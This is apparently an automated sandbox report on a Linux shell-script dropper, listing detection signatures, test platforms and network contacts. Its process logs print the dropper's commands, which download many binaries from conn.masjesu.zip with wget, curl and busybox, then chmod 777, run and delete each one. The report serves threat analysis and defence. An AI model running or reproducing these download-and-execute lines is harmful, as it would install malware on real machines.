Analysis Overview
SHA256
6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5
Threat Level: Shows suspicious behavior
The file 6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| GB | 89.187.167.5:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
2s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:42
Reported
2024-10-28 02:44
Platform
debian9-mipsbe-20240611-en
Max time kernel
146s
Max time network
150s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | N/A |
| N/A | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | N/A |
| N/A | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | N/A |
| N/A | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | N/A |
| N/A | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | N/A |
| N/A | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | N/A |
| N/A | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | N/A |
| N/A | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | N/A |
| N/A | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | N/A |
| N/A | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | N/A |
| N/A | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | N/A |
| N/A | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | N/A |
| N/A | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | N/A |
| N/A | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | N/A |
| N/A | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | N/A |
| N/A | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | N/A |
| N/A | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | N/A |
| N/A | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | N/A |
| N/A | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /usr/bin/curl | N/A |
| File opened for modification | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead | /usr/bin/curl | N/A |
| File opened for modification | /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf | /usr/bin/curl | N/A |
Processes
/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh
[/tmp/6984b6d84c72c16fe2e373f060552fb6c17fb0c2d30546d2f5cd9b47e60dcaa5.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/chmod
[chmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
[./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/bin/rm
[rm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/chmod
[chmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
[./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/bin/rm
[rm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/chmod
[chmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
[./ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/bin/rm
[rm ekoIDag2IrendezgvRAX8H4MvHggSiH31v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/chmod
[chmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
[./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/bin/rm
[rm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/chmod
[chmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
[./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/bin/rm
[rm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/chmod
[chmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
[./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/bin/rm
[rm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/chmod
[chmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
[./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/bin/rm
[rm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/chmod
[chmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
[./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/bin/rm
[rm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/chmod
[chmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
[./OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/rm
[rm OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/chmod
[chmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
[./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/rm
[rm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/chmod
[chmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead
[./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/rm
[rm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/chmod
[chmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA
[./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/rm
[rm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/chmod
[chmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf
[./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/rm
[rm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/bin/chmod
[chmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF
[./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/bin/rm
[rm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/chmod
[chmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead
[./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/bin/rm
[rm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/chmod
[chmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA
[./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/bin/rm
[rm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/chmod
[chmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
[./OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/bin/rm
[rm OESnKxfsceE83uK3qyhjMDf2qeykBknq50]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/chmod
[chmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
[./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/bin/rm
[rm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/chmod
[chmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf
[./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/bin/rm
[rm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
